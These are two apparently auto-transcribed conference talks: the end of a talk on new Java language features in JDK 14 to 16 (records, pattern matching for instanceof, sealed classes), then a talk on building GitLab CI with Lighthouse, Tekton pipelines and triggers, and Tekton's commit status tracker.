case, we can use what's called a compact constructor. So here what we're doing is we're saying let's define a record called range, again, two values low and high. And what it's going to do now is have a compact constructor, which is called range. Now we don't have to have the brackets with the values specified for them, so we don't have to replicate the int low, int high there because we've already got those in the definition of the record. So that's one nice thing that limits a little bit of bloat. And then within that, we can define the body of the constructor and we can have an if statement if low greater than high, throw an illegal argument exception and okay, that all works the way that we want it to. So we've got more flexibility in terms of what we can do with records. Okay, few additional things about records because although records are like classes, there are some subtle things which we need to understand. So the first thing is that the compact constructor can only throw an unchecked exception. You can't throw a checked exception because there's no syntax in there in terms defining the compact constructor to say it throws a type of exception. So syntax for that doesn't allow specifying a checked exception. 
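A compact sketch of the two record shapes described above — the Point tuple and the Range record with a compact constructor. This is a reconstruction of the kind of code on the slides, not the exact source.

```java
// Records (preview in JDK 14): the compiler generates the constructor,
// the accessors x() and y(), plus equals, hashCode and toString.
record Point(double x, double y) { }

// A compact constructor validates without repeating the parameter list;
// it may only throw unchecked exceptions.
record Range(int low, int high) {
    Range {
        if (low > high) {
            throw new IllegalArgumentException("low must be <= high");
        }
    }
}
```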
In terms of the standard methods that you have with the object equals hash code and two string, you can override those within a record. So there's no problem with doing that. You can actually override them and everything will work exactly the way that you expect it to. Base class of all records is Java dot lang dot record. So that's a new class that's been introduced and this is also a preview feature. This again comes back to the idea of preview features that allow you to include things without making it part of the standard. This was a specific thing that needed to be done because if we added record as part of the Java standard, the way they did it before was to immediately deprecate it so they could potentially remove it if it needed to be. Now we have them as part of the preview feature so they're not actually part of the standard straight away. Records don't follow the Java being pattern. So that's something that's a slight subtlety in terms of the way this works. So the thing here is that rather than using the bean pattern, which the accessor methods would typically be called getX and getY, they've decided to use the shorter version, which is simply X and Y. So you don't have the get part of that. I personally would prefer to see the bean pattern but it's one of those things where if you ask 100 developers, 50 will go one way, 50 will go the other way. So it doesn't really matter but it's just something to be aware of. Instance fields cannot be added to a record. So you define obviously X and Y in the example we had at the point, low and high in our range. You can't add any more instance variables to that record. There's nowhere of doing that. However, if you want to, you can do that for static fields. So you can add static fields to your record but you can't add an instance field unless it's part of the record itself. And records can be generic. So that's all good. Instance off. So another thing that we got in JDK 14, if we look at the way that we use instance off where we passed an object but we don't know necessarily what type it is exactly, we need to test that in order to determine how we want to use it. This is very simple piece of code, the way that we would typically do that. So we say if obj instance of string and then within the body of the if statement, we say string s equals and then we cast our obj reference to a string because we know that it is an instance of string. So when we do that explicit cast, there's no danger of it getting a class cast exception. So there's no problem there. And then we can print out using the methods of the string to say s.length because now it is a string in terms of our reference and so we can use that without any problem. In terms of pattern matching with instance off, again, it's a preview feature in JDK 14. What we can now do is extend that syntax slightly. So we can say if obj instance of string, but then we'll add a variable to the end of that. So s. If obj instance of string s, at that point, we don't have to do the explicit cast anymore. The compiler is going to effectively do that for us and provide us with a reference that we can then use within that if statement. So here in terms of the true branch of that if statement, we can say system.out.printline s.length because we know that that's true. So it is an instance of string. It's been assigned to s. And so we can use the length method on that and everything will work. 
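The pattern-matching form just described, sketched as a small self-contained method (the printed messages are placeholders):

```java
class PatternMatchSketch {
    // Pattern matching for instanceof (preview in JDK 14): the type test
    // and the cast are combined, introducing the binding variable 's'.
    static void describe(Object obj) {
        if (obj instanceof String s) {
            // 's' is in scope here, where the test is known to be true
            System.out.println("String of length " + s.length());
        } else {
            // 's' is NOT in scope here - the compiler rejects any use of it
            System.out.println("Not a string: " + obj);
        }
    }
}
```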
However, if we tried to use s in the else branch of the if statement because s, sorry, because obj is not an instance of string, we won't have an assignment to s because it isn't string. So we couldn't use s in that situation. The compiler would reject it as an error. We can do some clever things with that. So we could do something like this. We can say if obj instance of string s and then do an and operator and check to see if the length of that string is greater than zero. If it is, then we'll print out the length of that string. Now, the reason we can do that safely is because in the case of the and operator, the left-hand side is always evaluated first. And only if that evaluates to true will the right-hand side of the operator be evaluated. So here we can safely say if obj instance of string, if that's true, then it is a string. So then we can call the length method on s and that's a safe operation. However, if obj is not a string, that will result in a false evaluation and we will never call the right-hand side so we don't need to worry about trying to call length on something that isn't on a string. Obviously, if we tried to do that with the or operator, that wouldn't work because in the case of the or operator, we have to evaluate both sides of the operator because either side will result in true or if either side results in true, then we go through and do whatever is in the if statement. So in this case, we couldn't do that and we get a compiler error because even if obj wasn't a string, we would still try to call length on s and it wouldn't work. I mean, there are some slightly odd things where you can do that and not necessarily get the results. It may not be clear exactly how things are working. So you could do something like this. You could say if o instance of string s and s.length greater than three, not if it's not that case, then you can return. Otherwise you can print out s.length. So we know that in the case of that if statement, we've evaluated it and we know that s is a string so we can then call length on that and print it out. So that will work even though you might think, oh, hang on. So where's the scope of that s actually going to work? Anything after that is true. Text blocks. Again, these were introduced in JDK13. But now because it was a preview feature, feedback also more development went through and so what they've done here in JDK14 is to add two more escape sequences. Pretty straightforward, pretty simple. One of those is to use the backslash at the end of the line and allow you to continue on without having a new line in the string that's generated. This is very similar if you've done shell programming, then you'll know exactly what this is like. And then also you can have a backslash s which doesn't remove the training spaces. So we'll keep those training spaces in there and they will become part of the string as well. JDK15, so the current, yes, the current release. So JDK15 introduced the idea of sealed classes and this is Jet360. Now in Java, obviously it's an object-oriented programming language and it has the concept of inheritance. So what we can do here is we can say we have a class called shape and we want to inherit from that so we can define triangle, square and pentagon which are subclasses of shape. That's all well and good but what we don't have is any control over which classes can subclass a particular class other than making it final. So if we make a class or an interface final, then we know that nobody can subclass that. 
So it's a kind of binary thing all or nothing. Either you don't make it final in which case anybody can subclass it, you make it final and nobody can subclass it. What sealed classes allows us to do is to have control over which classes can subclass a given class. And you can think of the final as being the ultimate sealed class as in, you know, it's completely sealed and nobody else can subclass it. See here, although they're called sealed classes, it also applies to interfaces and there's quite complicated logic as to why they use the term class here rather than type. I actually tweeted about this so if you look back on my Twitter feed you'll find there's a link from David Delabasi who replied to my question and it links to an explanation of why it's called sealed classes rather than sealed types. Now in terms of how this works is it introduces two new restricted identifiers. So these are sealed and permits and restricted identifiers are things like var where you can use it without it preventing you from using it as a variable name. So you can still use sealed and permits as variable names, but in certain situations where they're used, then they have, they're used as an identifier rather than, they're used as a keyword rather than identifier. There has one new reserved word which is non-sealed. Now because this has a hyphen in it, this is the first reserved word ever to have a hyphen in it, so there's no backward compatibility issues with that. So you can't use a hyphen in a variable name in Java, doesn't cause a problem. Classes that are using sealed classes must all be in the same package or module. So there has to be that visibility in terms of packaging and modules. So what we can do is we can do something like this, we can say public sealed class shape permits triangle square pentagon and that will allow us to do the same thing that we had before. So we have our shape as a superclass, triangle square pentagon as subclasses. However, what we now can't do, which we could have done before, is to try and have another class called circle inherit from shape. Because if we try and do that, because it's not listed in the permits set of classes, then it will actually fail and you'll get a compiler error. So we're now saying only those three classes, triangle, square and pentagon, can subclass shape, circle cannot. Now once we have a subclass, we then have to have a bit more information because we have to be explicit about the inheritance capabilities of each of those subclasses. Because obviously we've got a sealed class at the top, what does it mean in terms of those subclasses? And there are three separate things that we can do here. So the first is we could restrict the subclasses to a defined set. So we could actually continue that, that ceiling with a permitted set of classes. So we could do public sealed class triangle and then we could say, okay, that permits equilateral and isosceles and extends shape. In terms of another alternative is we could actually prevent any further subclassing. So we could make it final and that effectively seals it completely turns it off. And then the third option we've got, which is where we use that new reserved word, is to say that we can unseal it. So make it non-sealed. So now anybody, any class can inherit from pentagon. So we've said, okay, that in terms of the shape, we're restricting it to, yeah, so non-seal class pentagon extends shape. Second thing here or another thing here is the idea of a second preview of records. 
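Before turning to that second preview of records, here is a sketch of the sealed hierarchy just described. The subclass names come from the talk; whether each is sealed, final or non-sealed is one reasonable arrangement, chosen to show all three options.

```java
// Sealed classes (preview in JDK 15): only the permitted classes may extend
// Shape, and each permitted subclass must itself be sealed, final, or
// explicitly non-sealed.
public sealed class Shape permits Triangle, Square, Pentagon { }

sealed class Triangle extends Shape permits Equilateral, Isosceles { }
final class Equilateral extends Triangle { }
final class Isosceles  extends Triangle { }

final class Square extends Shape { }

non-sealed class Pentagon extends Shape { }   // anyone may extend Pentagon

// class Circle extends Shape { }  // compile error: not in the permits list
```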
Coming back to the second preview of records: they haven't made records part of the standard yet, but they've added a little more functionality. The idea here is that we can now have local records; it's like a local class, and it's implicitly static. This is quite useful, and here's a very good example of how we could use it. We've got a method, findTopSellers. What we do is declare a local record called Sales, which is a tuple of two things: the seller, and the sales figure, which is a double. Then we take the list of sellers we've got and process it with a stream and some lambda expressions. First we map each seller into a Sales record — taking the seller and the sales that seller had in a particular month as the other part of the tuple. Then we sort on the sales of each of those sellers, map back to the sellers, and collect into a list. Because it's sorted, we can see the ordering of the sellers based on how much they've sold in a given month, and doing that with a local record eliminates a whole lot of code we would otherwise have to write; it makes things much more concise. Finally, let's talk briefly about JDK 16, because this is coming out later this month, and there's not really that much in here from a language perspective. Records are now a full feature of Java SE, no longer a preview feature. There is one minor clarification: inner classes can now declare both implicitly and explicitly static members, and the impact of that is that it allows an inner class to declare a member that is a record class, so that will work. Pattern matching for instanceof is now also a feature of Java SE; no changes were needed, it has simply moved from preview feature to full feature. Sealed classes have been moved into a second preview, with one small terminology change around the standardization: we now have what are called contextual keywords rather than restricted identifiers and keywords — but since I'm running out of time, you'll have to look that one up. To summarize: we are moving Java forward faster. I think the six-month release cycle is working really well — lots of new little language features, tidying things up, simplifying a lot of syntax. Really good stuff. Preview features and incubator modules are working really well in terms of allowing those features to be developed in the open so people can provide feedback. And there's lots more to come: there are more things in Project Amber, and we've also got bigger projects like Valhalla with inline types and Loom with virtual threads. I think it's fair to say that Java is developing and continuing to deliver features that developers want and need. If you're looking for a build of OpenJDK, either free or with commercial support, then please go to our website at azul.com, and, like I say, there are free downloads to be had. And with that, thank you very much.
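For reference, here is a reconstruction of the local-record stream example described in the talk. The Seller type and its salesInMonth method are invented purely for illustration, and the descending sort is an assumption (so that "top" sellers come first).

```java
import java.util.Comparator;
import java.util.List;
import java.util.stream.Collectors;

class TopSellers {
    // Hypothetical domain type - the talk only describes the shape of the code.
    interface Seller {
        double salesInMonth(int month);
    }

    // JDK 15 second preview of records: a record may be declared locally
    // inside a method, and it is implicitly static.
    static List<Seller> findTopSellers(List<Seller> sellers, int month) {
        record Sales(Seller seller, double sales) { }

        return sellers.stream()
                .map(seller -> new Sales(seller, seller.salesInMonth(month)))
                .sorted(Comparator.comparingDouble(Sales::sales).reversed())
                .map(Sales::seller)
                .collect(Collectors.toList());
    }
}
```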
Java is changing faster than ever with new features being added every six months. Despite being over 25 years old, Java is still adapting to ensure it remains one of the most popular platforms on the planet. Find out in this session how to take advantage of many of these exciting new features. With the release of JDK 16, we will have had eight (yes eight!) versions of Java in less than four years. We still hear claims that Java is the new COBOL, and its popularity is in decline. The reality, however, is that Java developers are now being provided with new features at a faster pace than at any time in its 25-year history. Many of these new features provide exciting new language level changes, as well as useful new APIs. In this session, we’ll explore in detail what these changes are and how best to use them (as well as advice on when not to use them). We’ll also explain the significance of preview features and incubator modules.
10.5446/52808 (DOI)
Hi, Fostem. In this video, I would like to show you how to do CI on GitLab. Maybe not necessarily using the GitLab tools, but using cooler tools like Tecton or Pro. So my name is Rafa Manhard. I work as a consultant in IT, mainly in Kubernetes and Clouds. I went by bicycle to Monte Carlo last year and did a mountaineering certification, which was pretty rough and I'm very proud of. Last year, I joined a new team and my first task was to make a proof-of-concept for a cool, very sophisticated CI system. They asked what technologies we are using already and they said GitLab. Of course, GitLab has its own CI system and probably some of you know the.GitLab-CI emails that you have to include in every repo. But I wanted to use something new. The first thing I did, I was looking for cool CI solutions and most of them had CI bots. I made a list of all of the bots. There's a lot of them and probably I haven't found all of them. After days of trying the bots out and making evaluations, I found out that Pro is that bot that I would like to use in the future. What is Pro? Pro is coming from the Kubernetes GitLab project and is used on GitHub. And Pro is a chatbot that allows the user to interact with merge requests. So whenever I push something into the repo, the bots ask me to assign someone to a pull request and there's a whole structure how a pull request should be handled. So let's take a look and let's see how Pro looks like on Kubernetes project on GitHub. How to find Pro? Just Google for Kubernetes. GitHub. You can go to the official repository of Kubernetes. Just on the top, you can see there's a pull request and it was issued by a chatbot called Ked SCI Robot. That's Pro. So when you go to all the pull requests, you can see labels and let's just pick some pull request. And you can see the first comment to the pull request was issued by the CI robot. Some nice instructions, you have to assign someone. You can see the labels assigned to the pull request. That's Pro behind. Let's take a look at another pull request. Oh, yeah. Oh, and that's super nice. Here you can see that Pro ran some tests. So with this instruction, you can rerun the test, see the results of the tests. And all of this is made by the CI bot. You can see it has proof for that CI bot is called Pro. I was super happy with Pro and I was excited that they're going to use it in the future on GitLab. And I even found this map how to interact with push requests, who has to approve push requests and which parts of Pro interact with the users. And then I was looking how to use Pro on GitLab. It was not possible. I even asked the maintainers of Pro if there is a roadmap for using Pro on GitLab. And of course, they said they're looking for contributors. So if any of you want to bring Pro on GitLab, feel free to join them. Well, then I thought there's no way. I cannot use any Pro. I came back to the list of my bots and continued to search for an other alternative. But then I stumbled over Lighthouse. So what is Lighthouse? Lighthouse is also a chatbot, but it's coming from Jenkins X. Jenkins X managed to use Pro with his own solutions. And the solution is called Lighthouse. It doesn't have even a logo. And how Lighthouse works, it consists of few pods that managed incoming webhooks. For instance, Lighthouse webhooks pod, it converts the incoming webhooks from the Git provider and transfers them into Lighthouse jobs. You have a tecton controller which watches over the Lighthouse jobs and translates them into tecton pipelines. 
You have Focorn. And Focorn is blocking your Git provider from doing the next steps and is somehow, I would say, emulating the pipeline in your Git provider. So you see a job which is still running and you cannot proceed further. For instance, you cannot merge. There is Lighthouse Keeper. Lighthouse Keeper just watches in the chat of the pull request and is waiting for the approve label. You can specify which label it should be, but by default, it's the approve label. And of course, you have one component which is called GEC jobs and is a garbage collector for pipeline grants. So that's Lighthouse. How Lighthouse looks like, we're going to see now in the hands-on. Okay. Okay. Let's take a look at Lighthouse pods. We see a lot of pods running here. And those are the mentioned components. So you can see the webhooks, pod, the tecton controller, Keeper and the Focorn. So let's look at the logs of all of them. I'm just going to skip the logs higher. So we're going to see the fresh logs coming in. One for incoming webhooks and one for the tecton controller, which triggers the pipelines. Okay. You can already see there are some logs coming in, in one of the pods. Let's switch back. Okay. You can see in the same namespace, you can find two config maps, config and plugins. And those are specified here in the installation folder of Lighthouse. So what's inside? The config is basically the config of Lighthouse. And you have to name the verbosity or the repos you are using. And the plugins, you have to, you can configure all the plugins you are using. And you can specify which plugins are used in which repo. So for instance, if you're using repo demo three, you have to say, you want to use the plugin, for instance, labor. So for each repo, you have to specify the plugins. How to set up Lighthouse. You have to go to GitHub, there are repository. And you can see one of the webhooks is pointing on Lighthouse, on the Lighthouse hook. So whatever happens in the repository is being sent to Lighthouse. Okay. So let's see how it works. We're going to open a merge request. We're going to pick one test branch, which is a little bit different than the master branch. And we're going to open the merge request. We're going to do everything default. And now we're going to open the logs. So you can see that the webhook is going to arrive in Lighthouse. And you can see the bots are logging. And here you can see the Lighthouse bot. I called him bottom is already commenting. He's welcoming me. He's labeling the public request or merge request and also saying how to assign users. So for instance, I'm going to be assigned by myself. As you can see, there's a prefix LH, which stands for Lighthouse. And as you can see, I assigned myself the comment and then the bot Lighthouse here assigned me to the merge request. You can do other stuff. You can even use LH bark. And you're going to get some funny photos here. This one of the plugins is posting a picture of a dog. And there you go. And in the next step, you can specify pipelines, which are going to be run by the bot. But oh, and you can see here, the fochorn, the component of Lighthouse is running a pipeline. And this pipeline runs as long. There is no approved label on the public request. So if there's no one puts the approved label, the pipeline is going to be run by fochorn. And then you cannot merge to the master branch. Okay. So far, so good. We have a chatbot which works really nicely with GitLab. It's kind of pro but called Lighthouse. 
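To make the per-repository plugin configuration mentioned above a little more concrete, here is a sketch of what an entry in the "plugins" ConfigMap might look like. It is modeled on the Prow-style plugins file that Lighthouse inherits; the repository path and plugin names are placeholders, and the exact keys can differ between Lighthouse versions, so treat this purely as a sketch.

```yaml
# plugins.yaml (stored in the 'plugins' ConfigMap) - sketch only
plugins:
  my-group/demo3:        # placeholder GitLab group/repo
  - approve
  - assign
  - label
  - dog                  # the plugin believed to answer "/lh-bark"
```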
Yeah, but I haven't showed you the pipelines. Why? Because it's a lot of difficulties to get the pipelines running. I was communicating one of the maintainers of Lighthouse, which is Jason. And Jason said Lighthouse works really nicely but with Jenkins X. And I was not using Jenkins X. I just wanted to use Tecton. And it was not working. So after a few days of debugging, I found out that the hand chart that I was using to install Lighthouse and the Tecton pipelines was not right. There was some bug and the bug was fixed and afterwards the pipelines were working. And I also found out that the payload which is sent to the webhooks, to the pod webhooks, is not transmitted to the pipelines. So the pipelines doesn't know which reputable clone to use. It's a huge downside of Lighthouse. And I need to set up each pipeline for each repo. And I didn't want it to do that. One more downside of Lighthouse is that you have these two config maps, config and plugins, YAMLs, that you need to configure to use a specific rep or whatever you add and a new repository. So you need to set up a config, YAML and plugins. That's not very agile in my opinion. Anyhow, besides these pipelines difficulties, I had a really nice working chat bot which acts like a row. It uses all the same plugins. And yeah, it was pretty straightforward to install it with a hand chart. So I have a chat bot, I have no pipelines. So I went on and I was looking like what if there are some nice CI pipeline systems and I went through a few of them. And I saw that Lighthouse often use with Tecton. So I tried to use Tecton with Lighthouse but not the way it's intended to use. So I really wanted to get Jason payload from the webhooks into Tecton. So Tecton was the engine for the pipelines again. So why Tecton is so cool? Because it has a serverless execution. Of course there's a controller bot but the execution is serverless. It has an IS API. Containers are the building blocks and you have reusable components. So you have tasks, pipelines, pipelines, resources. All of this you can find in a Tecton hub or you can specify your own components and use them in many biplans. Tecton is supported by a few big companies who will go out and think OpenShift is using Tecton. That's why Redhead and IBM. And let's take a look at Tecton. First let's install Tecton on our cluster. We're running the cluster in GCP and I'm using a few YAML files inside Tecton. First we install the Tecton pipelines. You can see it's a few customer resources, config maps, all but you can find it on the Tecton GitHub repo. And you can already see we have two pods. One is the controller for the pipelines and the other is the webhook for the pipelines. Okay, we go on. We're just going to install the dashboard so we can see something what pipelines look like. That's also from the Git repository of Tecton and there's a pod of the dashboard. Okay. And we need to install the ingress. We need to ingress so we can see the dashboard on our cluster. So that's all. Now we install Tecton. Okay, nice. Now we installed Tecton. But how does it work? So Tecton consists of a few customer resources and the basic building block is a task. It consists of many steps and each step is a container and a step can do stuff like create a deer in a repository, a clone repository. Very simple task. The task is bundled in a pipeline. It can be triggered by a pipeline run. So whenever I deploy a pipeline run, the pipeline is triggered and the pipeline triggers the task in a specific order. 
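Before the live demo, here is a minimal sketch of the two building blocks just described: a Task with one container step, and a TaskRun that triggers it. Names and the echoed message are placeholders; the API version matches the v1beta1 Tekton Pipelines resources current at the time of the talk.

```yaml
# Minimal Task / TaskRun pair in the spirit of the echo demo
apiVersion: tekton.dev/v1beta1
kind: Task
metadata:
  name: echo-hello
spec:
  steps:
  - name: say-hello            # each step runs as a container in the Task's pod
    image: ubuntu
    script: |
      #!/bin/sh
      echo "Hello from a Tekton task"
---
apiVersion: tekton.dev/v1beta1
kind: TaskRun
metadata:
  name: echo-hello-run
spec:
  taskRef:
    name: echo-hello           # applying this TaskRun triggers the Task above
```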
You can define the order which task should be triggered after which task. So let's have a look. Since we already installed Tecton, let's have a look how it looks like. Okay. A very simple demo. We have a task which is only doing echo and it will show the message. And we have a task run which triggers the task to run. Let's take a look how it looks like. We have our three Tecton pods. We take a look here to watch the task runs. And we're going to apply those two resources. First, let's deploy the task. So we have a task in the cluster waiting for the task run to trigger the task. And now we're going to deploy it. Let's take a look here. And we see the task run. It's impending. We are using a new pod which is starting. And it took 11 seconds. Let's take a look at the logs. Hello, CUNP dudes. You are successful. You can see it here. That's how the basic building blocks of Tecton works. Task is triggered by task run. Okay. Let's continue. We saw a task in the task run. Let's take a look at some one step further which is a pipeline and a pipeline run. So in the task demo, we have a few tasks. Two of them. We have a pipeline that is referencing those two tasks. And we have a pipeline run which triggers the pipeline. So similarly as before, let's take a look. Task runs, pipeline runs, now none. We have still our three pods. So let's go on and let's deploy all the resources that we need. Once we are going to deploy the tasks. This one, you have these two tasks. Okay. In the cluster. Let's continue the pipeline which is referencing the tasks. Yup. Pipeline in the cluster. And now the last one is going to trigger pipeline run and task runs. As you can see. We have a task run and pipeline run. We have two new pods. One is completed. The next one is starting. You can see it consists of two containers. Yeah. And let's take a look at the logs. Maybe let's take a simple one. Hello. You see the message. Let's take a look at the other one. Yeah. It shows us the information about the pipeline. It's the parameters that you get from the higher resources into the pipeline. And everything was successful. So that's how it is. Very simple. Tecton pipelines. Very cool feature of Tecton pipeline resources. Piping resources allow you to predefine resources that you very often use in pipelines. I'm using the most the Git resource and image resource. I can define from which repository to clone a repository down or where to push it, where to push the image that was built during the CI. There are many more resources. You have a pool request resource. You have storage resource, a cluster resource, and clothe event resource. And there are many more coming. We have our pipelines. So let's set up our repository and create a web hook to trigger our pipelines. So in GitLab, we just go to web hooks. We create a web hook which is reacting on push events. That's the only thing you need to do to trigger pipelines from GitLab. Now we have the web hook installed in GitLab. It's going to trigger our pipeline. We have a web hook pointing onto our ingress, but there's nothing behind. So that's why we have to use Tecton triggers. It's another part of Tecton. You can find in the same repository on Git. And Tecton triggers is the building block between the pipelines and our Git provider. First, let's install it. Okay. Let's go back to our cluster. And there we go. We have a YAML which installs the triggers. You can get it from the Git repository of Tecton triggers. Nope, typo. Just let's apply. Oh, I guess there's typo. One more time. 
So we have a webhook with nothing listening behind it, and that's why we have to use Tekton Triggers. It's another part of Tekton — you can find it on GitHub alongside the Tekton pipelines — and Tekton Triggers is the building block between the pipelines and our Git provider. So first, let's install it. Okay, back to our cluster. There we go, we have a YAML which installs the triggers; you can get it from the Git repository of Tekton Triggers. Nope, typo — let's just apply it. Oh, I guess there's a typo, one more time. Okay, let's apply the YAML. Wow, it's a long one. And you can see the pods: we are getting two new pods, the triggers controller and the triggers webhook. Our Git webhook is going to point at the webhook pod of the triggers. Okay, so we installed another part of Tekton, the Tekton Triggers. But what exactly is Tekton Triggers? Let's have a look. Tekton Triggers is the connecting block between the webhook and the pipeline. You can see here your Git provider — in this diagram it's GitHub, but we are using GitLab — sending a webhook. The webhook is received by the event listener. The event listener can decide, depending on the payload of the webhook, which trigger binding to send it to. The trigger binding passes values to the trigger template, the trigger template contains a pipeline run, the pipeline run triggers a pipeline, and the pipeline triggers the tasks. It may sound very complex, but it makes everything much more granular, you can swap out all the building blocks, and it works really well. So let's have a hands-on. Back to our environment: here you can see the listener, and it's listening for the event type "Push Hook" — whenever we push something to our GitLab, it sends a push webhook. This is what the webhook looks like: it's JSON, it has a lot of information about our Git repository, and it says it's a push hook. The listener is only going to let the push hooks through. Let's deploy the whole thing — the listener, the trigger bindings, the trigger templates — and see. We'll watch the logs of the event listener; let's hit enter so we see the new log lines coming in. We'll use curl to send the JSON payload to our ingress and on to our event listener, and we'll try to trigger the pipeline with this curl. And you can see something arrived at our event listener: we have a new pod, a new pipeline run and a new task run, and everything was successful. Let's take a look at the completed pod: it consists of two containers, which means the task consists of two steps. Let's pick one of them — for instance the step which lists whatever is in the repository — and you can see that's our repository, those are the files from our repository. That's a simple example of how the triggers work. Now let's look at the sequence of how the JSON payload arrives in a container. With the red arrow it looks like a straight line, but to get from the payload to the task you need to go through a trigger binding. The trigger binding takes a value from the payload and hands it to the trigger template, the trigger template hands it to the pipeline definition, and the pipeline definition puts the value into the task. The task is a pod with a few steps, each step being a container, and that's how information gets in there. For instance, if you want to clone a Git repository in the task, you need to know the URL and the commit ID of the repository, and that's how this information flows from the payload into the task. And actually, this is the ingredient that was missing in Lighthouse. That's why I couldn't use Lighthouse: when using Tekton pipelines without Jenkins X, you cannot get the information from the JSON body into the task.
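As a sketch of how that plumbing can look for a GitLab push event, the three resources below show one possible wiring. The resource names and parameter names are made up, the `ci-pipeline` it stamps out is assumed to declare `repo-url` and `revision` parameters, and a few details are left out: a GitLab interceptor (to filter on "Push Hook" events and check the secret token) would normally be added, the referenced service account needs the Triggers RBAC roles, and some field names (for example `template.ref` versus the older `template.name`, or the interceptor syntax) differ between Tekton Triggers releases.

```yaml
# TriggerBinding: pull fields out of the GitLab push webhook JSON body.
apiVersion: triggers.tekton.dev/v1alpha1
kind: TriggerBinding
metadata:
  name: gitlab-push-binding
spec:
  params:
    - name: git-repo-url
      value: $(body.project.git_http_url)   # repository URL from the push payload
    - name: git-revision
      value: $(body.checkout_sha)           # commit to check out
---
# TriggerTemplate: stamp out a PipelineRun with those values filled in.
apiVersion: triggers.tekton.dev/v1alpha1
kind: TriggerTemplate
metadata:
  name: gitlab-push-template
spec:
  params:
    - name: git-repo-url
    - name: git-revision
  resourcetemplates:
    - apiVersion: tekton.dev/v1beta1
      kind: PipelineRun
      metadata:
        generateName: ci-pipeline-run-
      spec:
        pipelineRef:
          name: ci-pipeline                 # assumed to declare matching params
        params:
          - name: repo-url
            value: $(tt.params.git-repo-url)
          - name: revision
            value: $(tt.params.git-revision)
---
# EventListener: the pod the GitLab webhook (via the ingress) points at.
apiVersion: triggers.tekton.dev/v1alpha1
kind: EventListener
metadata:
  name: gitlab-listener
spec:
  serviceAccountName: tekton-triggers-sa    # hypothetical SA with triggers roles
  triggers:
    - name: gitlab-push
      bindings:
        - ref: gitlab-push-binding
      template:
        ref: gitlab-push-template
```

With something like this applied, the curl from the demo — posting a saved push-hook JSON body to the listener behind the ingress — ends up as a fresh PipelineRun that knows which repository and commit to clone, which is exactly the piece that was missing with Lighthouse alone.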
But with Tekton Triggers and Tekton, we can trigger pipelines from our Git provider, regardless of which Git provider it is. It can be GitHub, GitLab and others, and we can use it next to Prow and Lighthouse. Okay. So we have a chat bot and we have really cool Tekton pipelines — it looks like we have everything, but there's something missing. We are missing a little bit of magic. And what is the magic? The magic is Kevin. Who is Kevin? Kevin is one of the Tekton lead contributors, and Kevin helped me a lot, because I was missing one thing in my pipelines and my CI: I couldn't see the pipelines running in GitLab. I was pushing something to GitLab and I couldn't see any information about the pipeline in the GUI. I didn't know if the pipeline was successful or not. I only saw the task runs and pipeline runs, which said whether they succeeded or failed, but I didn't see it in the GUI. So I was researching, and Kevin helped me a lot. In the Git repositories of Tekton there is one part which is called experimental, and there Kevin showed me a very cool thing, which is the commit status tracker. What is the commit status tracker? It's another controller — basically just a Docker container running — and it watches pipeline runs and looks at their annotations. You have to set specific annotations, like a git status, a status context and a status description, and depending on your annotations the commit status tracker reports back to GitHub or GitLab and shows you a pipeline running in your Git provider. And as long as the pipeline is not green, you cannot merge your pull request, for instance. It was the missing block to have a really cool CI system. Yeah, let's install it. Back again to our environment. Before we go into the commit status tracker, as you can see, we already have a few pods running. So there is our YAML, and here you can see the commit status tracker Docker image — it's very simple. Let's apply all of this, and you can see our commit status tracker has been running for four seconds. And let's try an example. I'm going to deploy something with specific annotations, and the commit status tracker is going to look at pipeline runs with those annotations. You can see there's a status context, and even a target website you can refer to — that means when I click on the pipeline in GitLab, I'm going to land on this page. And here you can see a pipeline resource of type git, which needs two things: the revision and the link to the repository. Let's have a look. Okay, in our GitLab, under pipelines, there's nothing — it's clean. Let's switch now to our tests. We have a task, a pipeline and a pipeline run; let's apply the whole deal. And we couldn't get the pipeline... oh yeah, that's because we deployed the pipeline run before the pipeline was deployed. Let's do it one more time, now step by step: we delete the pipeline run, we apply the task — okay, the task is in the cluster — then we go with the pipeline — it's in the cluster — and now we can trigger the pipeline run. Oops, the task one more time. Let's go with the pipeline run. Okay, we are triggering the pipeline run, it's pending... oh, it's already a success. We have a new pod, we have results. And let's look at our Git repository: we have a pipeline which is already green, because the pipeline passed, and that's because of our commit status tracker. Nice. We have all the building blocks; I think we are done now with the hands-on.
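For reference, the kind of resources the commit status tracker reacts to could look roughly like this. The repository URL, the names and the pipeline reference are placeholders, and the annotation keys shown are recalled from the experimental commit-status-tracker's documentation rather than taken from the talk, so they should be checked against the tektoncd/experimental repository.

```yaml
# A git PipelineResource telling the tracker (and the pipeline) which
# repository and revision the run is about.
apiVersion: tekton.dev/v1alpha1
kind: PipelineResource
metadata:
  name: demo-source
spec:
  type: git
  params:
    - name: url
      value: https://gitlab.example.com/demo/demo-repo.git   # placeholder repo
    - name: revision
      value: master
---
# A PipelineRun carrying the annotations the commit status tracker watches for.
apiVersion: tekton.dev/v1beta1
kind: PipelineRun
metadata:
  name: status-demo-run
  annotations:
    tekton.dev/git-status: "true"              # opt this run in to status reporting
    tekton.dev/status-context: "tekton-ci"     # name shown next to the commit in GitLab
    tekton.dev/status-description: "Tekton CI pipeline"
spec:
  pipelineRef:
    name: ci-pipeline           # assumed to declare a git resource named "source"
  resources:
    - name: source
      resourceRef:
        name: demo-source
```

When such a run completes, the tracker looks up the commit from the git resource and pushes a commit status to the Git provider, which is what makes the pipeline show up green (or red) in the GitLab UI as in the demo; a target-URL annotation can additionally make the GitLab entry link back to the Tekton dashboard.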
And you can see now, we have a merging bot, or chat bot, which is Prow by way of Jenkins X Lighthouse. We have Tekton for running our pipelines. And we have a little bit of Kevin's magic, the commit status tracker, to report the results of the pipelines back to our Git provider. Let's have a look at this diagram, which compares Prow and Tekton. In Prow, you have a component called hook, which waits for the webhooks. In Tekton, we have Tekton Triggers with interceptors and event listeners, as we saw before. For job execution, in Prow you have plank, but in Tekton you have the Tekton pipelines. In Prow, you have a dashboard, deck. It's missing in Lighthouse, because Lighthouse does not have all the components of Prow, but we can use the Tekton dashboard that we installed in our hands-on. In Prow, you have tide for merging. In Tekton there is no tide, there is no bot, but we are using Lighthouse, which is Prow-like, and that's how we have a really nice merging bot — I think the nicest available. For the periodic jobs, I haven't shown this here, but for this we can use triggers and Kubernetes cron jobs: a cron job can trigger a task, which gives you a periodic job. And for garbage collection we don't have anything built in, but for that you can use a simple cron job — you don't need any other technology. Okay. So I believe that with these three steps, we managed to build up a really nice CI system on top of GitLab. We are not using GitLab as the app of all apps; we want to use GitLab as a Git repository, not as an engine for running pipelines. And instead of GitLab, we could use Bitbucket or GitHub, as long as we are using Lighthouse, Tekton and our small magic step. I believe that in the future Tekton is going to come up with better mechanisms to 